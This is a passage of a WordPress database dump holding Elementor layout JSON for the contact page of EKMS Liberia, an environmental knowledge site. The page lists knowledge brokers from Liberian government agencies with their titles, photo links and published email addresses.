\\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34836,5090,'_elementor_edit_mode','builder'),(34837,5090,'_elementor_template_type','wp-page'),(34838,5090,'_elementor_version','3.0.16'),(34839,5090,'_wp_page_template','default'),(34840,5090,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a 